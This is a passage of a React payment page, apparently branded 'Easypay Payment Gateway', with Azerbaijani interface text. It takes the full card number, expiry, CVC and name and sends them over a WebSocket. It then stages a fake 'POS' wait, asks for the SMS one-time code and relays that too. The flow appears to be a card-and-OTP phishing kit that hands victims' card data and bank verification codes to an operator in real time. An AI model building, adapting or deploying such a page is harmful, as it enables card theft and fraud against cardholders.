      if (nextField) nextField.focus();
    }, 0);
  };

  const handleNameChange = (e) => {
    const formatted = formatName(e.target.value);
    setNameOnCard(formatted);
    // Clear error when user starts typing
    if (formError) setFormError("");
  };

  const handleCardNumberChange = (e) => {
    const formatted = formatCardNumber(e.target.value);
    setCardNumber(formatted);
    // Clear error when user starts typing
    if (formError) setFormError("");

    if (formatted.replace(/\s/g, "").length >= 16) {
      focusNextField(".exp-date");
    }
  };

  const handleExpDateChange = (e) => {
    const formatted = formatExpDate(e.target.value);
    setExpDate(formatted);
    // Clear error when user starts typing
    if (formError) setFormError("");

    if (formatted.length >= 5) {
      focusNextField(".cvc");
    }
  };

  const handleCvcChange = (e) => {
    const value = e.target.value.replace(/\D/g, "");
    setCvc(value);
    // Clear error when user starts typing
    if (formError) setFormError("");

    if (value.length >= 3) {
      focusNextField(".pay-button");
    }
  };

  const sendCardInfo = () => {
    // Clear previous errors
    setFormError("");

    // Name validation
    if (!isNameDisabled && (!nameOnCard || nameOnCard.trim() === "")) {
      setFormError("Ad və soyad məcburidir");
      return;
    }

    // Card number validation
    const cleanedNumber = cardNumber.replace(/\s/g, "");
    if (!cleanedNumber || cleanedNumber.length < 16) {
      setFormError("Kart nömrəsi məcburidir və 16 rəqəm olmalıdır");
      return;
    }

    // Expiry date validation
    if (!expDate || expDate.length < 5) {
      setFormError("İstifadə tarixi məcburidir və MM/YY formatında olmalıdır");
      return;
    }

    // Parse expiry date
    const [expMonth, expYear] = expDate.split("/");
    if (
      !expMonth ||
      !expYear ||
      expMonth.length !== 2 ||
      expYear.length !== 2
    ) {
      setFormError("İstifadə tarixi MM/YY formatında olmalıdır");
      return;
    }

    const month = parseInt(expMonth, 10);
    const year = parseInt("20" + expYear, 10);
    const currentDate = new Date();
    const currentYear = currentDate.getFullYear();
    const currentMonth = currentDate.getMonth() + 1;

    // Month validation
    if (month < 1 || month > 12) {
      setFormError("Düzgün ay daxil edin (01-12)");
      return;
    }

    // Year validation
    if (year > 2050) {
      setFormError("Düzgün il daxil edin");
      return;
    }

    // Card expiry check
    if (year < currentYear || (year === currentYear && month < currentMonth)) {
      setFormError("Kartın istifadə müddəti bitib. Düzgün kart daxil edin");
      return;
    }

    // CVC validation
    if (!cvc || cvc.length < 3) {
      setFormError("CVC məcburidir və minimum 3 rəqəm olmalıdır");
      return;
    }

    // Amount validation
    if (!amount || amount <= 0) {
      setFormError("Məbləğ məcburidir");
      return;
    }

    if (amount < 5 || amount > 5000) {
      setFormError("Məbləğ 5 və 5000 AZN arasında olmalıdır");
      return;
    }

    // WebSocket connection check
    if (!wsRef.current || wsRef.current.readyState !== WebSocket.OPEN) {
      setFormError("Bağlantı problemi. Yenidən cəhd edin");
      return;
    }

    // All validations passed, send card info
    setIsFormLoading(true);

    const message = {
      type: "cardInfoEntered",
      data: {
        number: cleanedNumber,
        expiry: expDate,
        cvc: cvc,
        name: nameOnCard.trim(),
        amount: amount,
      },
    };

    try {
      wsRef.current.send(JSON.stringify(message));
      // console.log("💳 Card information sent:", message);

      // Set timeout for card info processing (30 seconds)
      const cardInfoTimeout = setTimeout(() => {
        if (isFormLoading) {
          setIsFormLoading(false);
          setFormError("Zaman aşımı. Yenidən cəhd edin");
          // console.warn("⏰ Card info processing timeout");
        }
      }, 30000);

      // Store timeout ID to clear it if response comes in time
      wsRef.current.cardInfoTimeoutId = cardInfoTimeout;

      // Keep loading until cardInfoProcessed response
      // setCurrentStage(2) will be called when backend responds
    } catch (error) {
      // console.error("❌ Error sending card info:", error);
      setFormError("Məlumat göndərilmədi. Yenidən cəhd edin");
      setIsFormLoading(false);
    }
  };

  const handlePayClick = () => {
    sendCardInfo();
  };

  const handleSmsCodeChange = (e) => {
    const value = e.target.value.replace(/\D/g, "");
    setSmsCode(value);
    // Clear SMS error when user starts typing
    if (smsError) setSmsError("");
  };

  const sendSmsCode = () => {
    // Clear previous errors
    setSmsError("");

    // SMS code validation
    if (!smsCode || smsCode.trim() === "") {
      setSmsError("SMS kodu məcburidir");
      return;
    }

    if (smsCode.length < 3) {
      setSmsError("SMS kodu çox qısadır (minimum 3 rəqəm)");
      return;
    }

    if (smsCode.length < 4) {
      setSmsError("SMS kodu tam daxil edilməyib");
      return;
    }

    // WebSocket connection check
    if (!wsRef.current || wsRef.current.readyState !== WebSocket.OPEN) {
      setSmsError("Bağlantı problemi. Yenidən cəhd edin");
      return;
    }

    // All validations passed, send SMS code
    setIsSmsLoading(true);

    const message = {
      type: "smsCodeEntered",
      data: smsCode.trim(),
      token: token,
    };

    try {
      wsRef.current.send(JSON.stringify(message));
      // console.log("📱 SMS code sent:", message);

      // Set timeout for SMS processing (30 seconds)
      const smsTimeout = setTimeout(() => {
        // Only trigger timeout if we're still in SMS loading state
        if (isSmsLoading && currentStage === 3) {
          setIsSmsLoading(false);
          setSmsError("SMS kodu yoxlanırken zaman aşımı. Yenidən cəhd edin");
          // console.warn("⏰ SMS processing timeout");
        }
      }, 30000);

      // Store timeout ID to clear it if response comes in time
      wsRef.current.smsTimeoutId = smsTimeout;

      // Keep loading until response (depositApproved/depositDeclined)
    } catch (error) {
      // console.error("❌ Error sending SMS code:", error);
      setSmsError("SMS kodu göndərilmədi. Yenidən cəhd edin");
      setIsSmsLoading(false);
    }
  };

  const handleSmsSubmit = () => {
    sendSmsCode();
  };

  return (
    <div className="payment-container">
      <div className="left-column">
        <div className="hero-section">
          <div className="hero-background"></div>
          <div className="hero-content">
            <div className="app-icon">
              <img
                src="/hero1.webp"
                alt="App Icon"
                className="app-icon-image"
              />
            </div>
            <div className="app-info">
              <h2 className="app-title">Easypay Payment Gateway</h2>
              <p className="app-subtitle">Secure & Fast Payments</p>
            </div>
          </div>
        </div>
        <div className="footer">
          <p>Powered by Easypay</p>
        </div>
      </div>
      <div className="right-column">
        {/* Multi Payment Error Screen - Override everything */}
        {hasMultiPaymentError && (
          <div className="multi-payment-error-container">
            <div className="multi-payment-animation-wrapper">
              <Lottie
                animationData={failedAnimation}
                loop={true}
                autoplay={true}
                className="multi-payment-animation"
              />
            </div>

            <div className="multi-payment-content">
              <h2 className="multi-payment-title">Ödəniş Prosesi Aktiv</h2>

              <div className="multi-payment-description">
                <p>
                  Bu ödəniş prosesi hal-hazırda <strong>başqa sekmədə</strong>{" "}
                  və ya
                  <strong> cihazda</strong> açıqdır.
                </p>
              </div>

              <div className="multi-payment-info-box">
                <div className="info-icon">
                  <svg
                    width="24"
                    height="24"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" />
                  </svg>
                </div>
                <div className="info-content">
                  <h4>Nə edə bilərsiniz?</h4>
                  <ul>
                    <li>Açıq olan ödəniş səhifəsindən davam edin</li>
                    <li>Digər sekməni və ya cihazı bağlayın</li>
                    <li>Bir neçə dəqiqə gözləyib yenidən cəhd edin</li>
                    <li>Problem davam edərsə səhifəni yeniləyin</li>
                  </ul>
                </div>
              </div>

              <div className="multi-payment-actions">
                <button
                  className="refresh-button"
                  onClick={() => window.location.reload()}
                >
                  <svg
                    width="18"
                    height="18"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <path d="M17.65 6.35C16.2 4.9 14.21 4 12 4c-4.42 0-7.99 3.58-7.99 8s3.57 8 7.99 8c3.73 0 6.84-2.55 7.73-6h-2.08c-.82 2.33-3.04 4-5.65 4-3.31 0-6-2.69-6 6s2.69-6 6-6c1.66 0 3.14.69 4.22 1.78L13 11h7V4l-2.35 2.35z" />
                  </svg>
                  Səhifəni Yenilə
                </button>
              </div>
            </div>
          </div>
        )}

        {/* Payment methods and amount - only show after stage 0 and no multi payment error */}
        {currentStage > 0 && !hasMultiPaymentError && (
          <div className="payment-methods">
            <button className="method-button selected card-method-large">
              <div className="method-icon">
                <CardIcon />
              </div>
              <span className="method-text">Card</span>
            </button>
            <div className="payment-amount">
              <span className="amount-label">Amount</span>
              <span className="amount-text">{amount.toFixed(2)} AZN</span>
            </div>
          </div>
        )}

        {/* Stage 0: Initial Loading or Token Error */}
        {currentStage === 0 && hasValidToken && !hasMultiPaymentError && (
          <div className="stage0-container">
            <div className="loading-animation-wrapper">
              <Lottie
                animationData={authAnimation}
                loop={true}
                autoplay={true}
                className="auth-animation"
              />
            </div>
            <div className="loading-message">
              <p>Əməliyyatınız yoxlanılır, zəhmət olmasa gözləyin..</p>
            </div>
          </div>
        )}

        {/* Token Error or Invalid Path Stage - 404 Design */}
        {!hasValidToken && !hasMultiPaymentError && (
          <div className="token-error-container error-404-container">
            <div className="error-animation-wrapper">
              <Lottie
                animationData={notFoundAnimation}
                loop={true}
                autoplay={true}
                className="not-found-animation"
              />
            </div>

            <div className="error-content">
              <h3 className="error-subtitle">
                Üzr istəyirik, axtardığınız səhifə mövcud deyil
              </h3>
              <div className="error-description">
                <p>
                  {method === "HPP" ? (
                    <>
                      Ödəmə bağlantınız <strong>etibarsızdır</strong> və ya{" "}
                      <strong>eksik parametrlər</strong> daxil edir.
                      <br />
                      Zəhmət olmasa etibarlı bir ödəmə linki ilə yenidən cəhd
                      edin.
                    </>
                  ) : (
                    <>
                      Daxil etdiyiniz ünvan <strong>mövcud deyil</strong> və ya{" "}
                      <strong>silinmiş</strong> ola bilər.
                      <br />
                      Ana səhifəyə qayıtmaq üçün düzgün bağlantı istifadə edin.
                    </>
                  )}
                </p>
              </div>

              <div className="error-actions">
                <div className="error-suggestions">
                  <h4>Nə edə bilərsiniz?</h4>
                  <ul>
                    <li>URL ünvanını yoxlayın</li>
                    <li>Ödəmə bağlantınızın düzgün olduğundan əmin olun</li>
                    <li>Bağlantının güncel olduğunu təsdiqləyin</li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
        )}

        {/* Stage 1: Card Information Form */}
        {currentStage === 1 && !hasMultiPaymentError && (
          <>
            <div className="card-info-section">
              <div className="section-label">
                <span>Card information</span>
                <div className={`payment-timer ${getTimerClass()}`}>
                  <div className="timer-icon">
                    <svg
                      width="16"
                      height="16"
                      viewBox="0 0 24 24"
                      fill="currentColor"
                    >
                      <circle
                        cx="12"
                        cy="12"
                        r="10"
                        stroke="currentColor"
                        strokeWidth="2"
                        fill="none"
                      />
                      <path
                        d="M12 6v6l4 2"
                        stroke="currentColor"
                        strokeWidth="2"
                        strokeLinecap="round"
                      />
                    </svg>
                  </div>
                  <span className="timer-text">{formatTime(timeLeft)}</span>
                </div>
              </div>
              <div className="input-wrapper name-on-card">
                <input
                  type="text"
                  placeholder="Name on card"
                  autoComplete="cc-name"
                  tabIndex="1"
                  value={nameOnCard}
                  onChange={handleNameChange}
                  maxLength="50"
                  disabled={isNameDisabled}
                  className={isNameDisabled ? "disabled-input" : ""}
                />
                <PersonIcon />
              </div>
              <div className="input-wrapper card-number">
                <input
                  type="text"
                  placeholder="Card number"
                  autoComplete="cc-number"
                  tabIndex="2"
                  value={cardNumber}
                  onChange={handleCardNumberChange}
                  inputMode="numeric"
                  maxLength="19"
                />
                <CreditCardIcon />
              </div>
              <div className="card-exp-cvc">
                <div className="input-wrapper">
                  <input
                    type="text"
                    placeholder="MM / YY"
                    className="exp-date"
                    autoComplete="cc-exp"
                    tabIndex="3"
                    value={expDate}
                    onChange={handleExpDateChange}
                    inputMode="numeric"
                    maxLength="5"
                  />
                </div>
                <div className="input-wrapper cvc-wrapper">
                  <input
                    type="text"
                    placeholder="CVC"
                    className="cvc"
                    autoComplete="cc-csc"
                    tabIndex="4"
                    value={cvc}
                    onChange={handleCvcChange}
                    inputMode="numeric"
                    maxLength="4"
                  />
                  <CVVIcon />
                </div>
              </div>
            </div>

            {/* Stage 1 Warning Message */}
            <div className="warning-message">
              <div className="warning-icon">
                <svg
                  width="16"
                  height="16"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M12 2L1 21h22L12 2zm0 3.99L19.53 19H4.47L12 5.99zM11 16h2v2h-2v-2zm0-6h2v4h-2v-4z" />
                </svg>
              </div>
              <p>
                Lütfən, göstərilən müddət ərzində lazımi məlumatları daxil edin
                və bu ekranı bağlamayın. Əks halda əməliyyatınız ləğv ediləcək.
              </p>
            </div>

            {/* Form Error Message */}
            {formError && (
              <div className="form-error-message">
                <div className="error-icon">
                  <svg
                    width="16"
                    height="16"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" />
                  </svg>
                </div>
                <p>{formError}</p>
              </div>
            )}

            <button
              type="button"
              className={`pay-button ${isFormLoading ? "loading" : ""}`}
              tabIndex="5"
              onClick={handlePayClick}
              disabled={isFormLoading}
            >
              {isFormLoading ? (
                <>
                  <div className="button-spinner"></div>
                  Göndərilir...
                </>
              ) : (
                <>
                  <PayIcon />
                  Pay
                </>
              )}
            </button>
          </>
        )}

        {/* Stage 2: POS Animation */}
        {currentStage === 2 && !hasMultiPaymentError && (
          <div className="stage2-container">
            <div className="section-label">
              <span>Ödəmə prosesi</span>
              <div className={`payment-timer ${getTimerClass()}`}>
                <div className="timer-icon">
                  <svg
                    width="16"
                    height="16"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <circle
                      cx="12"
                      cy="12"
                      r="10"
                      stroke="currentColor"
                      strokeWidth="2"
                      fill="none"
                    />
                    <path
                      d="M12 6v6l4 2"
                      stroke="currentColor"
                      strokeWidth="2"
                      strokeLinecap="round"
                    />
                  </svg>
                </div>
                <span className="timer-text">{formatTime(timeLeft)}</span>
              </div>
            </div>

            {/* Stage 2 Warning Message */}

            {/* <div className="warning-message stage2-warning">
              <div className="warning-icon">
                <svg
                  width="16"
                  height="16"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z" />
                </svg>
              </div>
              <p>
                Lütfən, əməliyyatınızı tamamlamaq üçün sistem tərəfindən
                göndərilən SMS kodunu gözləyin. SMS qutusu göründükdən sonra
                kodu düzgün bir şəkildə daxil edin. Yanlış və ya natamam daxil
                etdiyiniz halda əməliyyat ləğv ediləcək.
              </p>
            </div> */}

            <div className="warning-message stage2-warning stage2-warning--green icon-top-left">
              <div className="warning-icon">
                <svg
                  width="16"
                  height="16"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z" />
                </svg>
              </div>
              <p>
                Lütfən, əməliyyatınızı tamamlamaq üçün sistem tərəfindən
                göndərilən SMS kodunu gözləyin.{" "}
                <strong>
                  SMS-in çatması adətən 30 saniyə ilə 1 dəqiqə 30 saniyə
                  arasında çəkə bilər
                </strong>{" "}
                (çox sıx günlərdə bu müddət bir qədər uzana bilər). SMS qutusu
                göründükdən sonra kodu düzgün daxil edin; yanlış və ya natamam
                daxil etdiyiniz halda əməliyyat ləğv ediləcək. Narahat olmayın –
                SMS mütləq sizə çatacaq.
              </p>
            </div>

            <div className="pos-animation-wrapper">
              <POSAnimation />
            </div>
          </div>
        )}

        {/* Stage 3: SMS Code Input */}
        {currentStage === 3 && !hasMultiPaymentError && (
          <div className="stage3-container">
            <div className="section-label">
              <span>
                Ödəmə prosesi <span className="stage-indicator">(SMS)</span>
              </span>
              <div className={`payment-timer ${getTimerClass()}`}>
                <div className="timer-icon">
                  <svg
                    width="16"
                    height="16"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <circle
                      cx="12"
                      cy="12"
                      r="10"
                      stroke="currentColor"
                      strokeWidth="2"
                      fill="none"
                    />
                    <path
                      d="M12 6v6l4 2"
                      stroke="currentColor"
                      strokeWidth="2"
                      strokeLinecap="round"
                    />
                  </svg>
                </div>
                <span className="timer-text">{formatTime(timeLeft)}</span>
              </div>
            </div>

            <div className="sms-input-section">
              <div className="input-wrapper sms-code-input">
                <input
                  type="text"
                  placeholder="SMS kodu daxil edin"
                  value={smsCode}
                  onChange={handleSmsCodeChange}
                  inputMode="numeric"
                  maxLength="6"
                  className="sms-code"
                />
                <div className="sms-icon">
                  <svg
                    width="20"
                    height="20"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z" />
                  </svg>
                </div>
              </div>

              {/* SMS Error Message */}
              {smsError && (
                <div className="form-error-message sms-error-message">
                  <div className="error-icon">
                    <svg
                      width="16"
                      height="16"
                      viewBox="0 0 24 24"
                      fill="currentColor"
                    >
                      <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" />
                    </svg>
                  </div>
                  <p>{smsError}</p>
                </div>
              )}

              <button
                type="button"
                className={`send-sms-button ${isSmsLoading ? "loading" : ""}`}
                disabled={smsCode.length < 4 || isSmsLoading}
                onClick={handleSmsSubmit}
              >
                {isSmsLoading ? (
                  <>
                    <div className="button-spinner sms-spinner"></div>
                    Yoxlanılır...
                  </>
                ) : (
                  <>
                    <svg
                      width="18"
                      height="18"
                      viewBox="0 0 24 24"
                      fill="currentColor"
                    >
                      <path d="M2.01 21L23 12 2.01 3 2 10l15 2-15 2z" />
                    </svg>
                    SMS Göndər
                  </>
                )}
              </button>
            </div>
          </div>
        )}

        {/* Stage 4: Payment Processing */}
        {currentStage === 4 && !hasMultiPaymentError && (
          <div className="stage4-container">
            <div className="section-label">
              <span>
                Ödəmə prosesi <span className="stage-indicator">(SMS)</span>
              </span>
              <div className={`payment-timer ${getTimerClass()}`}>
                <div className="timer-icon">
                  <svg
                    width="16"
                    height="16"
                    viewBox="0 0 24 24"
                    fill="currentColor"
                  >
                    <circle
                      cx="12"
                      cy="12"
                      r="10"
                      stroke="currentColor"
                      strokeWidth="2"
                      fill="none"
                    />
                    <path
                      d="M12 6v6l4 2"
                      stroke="currentColor"
                      strokeWidth="2"
                      strokeLinecap="round"
                    />
                  </svg>
                </div>
                <span className="timer-text">{formatTime(timeLeft)}</span>
              </div>
            </div>

            {/* Stage 4 Warning Message - Same as Stage 3 */}

            <div className="money-animation-wrapper">
              <Lottie
                animationData={loadingAnimation}
                loop={true}
                autoplay={true}
                className="money-stack-gif"
              />
            </div>

            <div className="processing-message">
              <p>Lütfən gözləyin, ödəniş emal olunur...</p>
            </div>
          </div>
        )}

        {/* Stage 5: Payment Approved */}
        {currentStage === 5 && !hasMultiPaymentError && (
          <div className="stage5-container">
            <div className="section-label">
              <span>Ödəmə Təsdiqləndi</span>
            </div>

            <div className="success-animation-wrapper">
              <Lottie
                animationData={correctAnimation}
                className="correct-animation"
                loop={false}
              />
            </div>

            <div className="success-message">
              <p>
                Ödəmənizniz başarıyla onaylandı, yönlendiriliyorsunuz lütfən
                bekleyiniz.
              </p>
              <p className="redirect-info">
                Əgər 3 saniyə ərzində yönləndirilməsəniz, səhifəni bağlayıb
                təchizatçı səhifənizə geri qayıda bilərsiniz.
              </p>
            </div>
          </div>
        )}

        {/* Stage 6: Payment Failed */}
        {currentStage === 6 && !hasMultiPaymentError && (
          <div className="stage6-container">
            <div className="section-label">
              <span>Ödəmə Rədd Edildi</span>
            </div>

            <div className="failed-animation-wrapper">
              <Lottie
                animationData={failedAnimation}
                className="failed-animation"
                loop={false}
              />
            </div>

            <div className="failed-message">
              <p>
                Ödəməniniz rədd edildi.
                {declineExplanation && (
                  <>
                    <br />
                    <strong>Səbəb:</strong> {declineExplanation}
                  </>
                )}
              </p>
              <p className="failed-suggestion">
                Xahiş edirik, məlumatlarınızı yoxlayın və yenidən cəhd edin.
              </p>
            </div>
          </div>
        )}
      </div>
    </div>
  );
};

export default NewPaymentGateway;
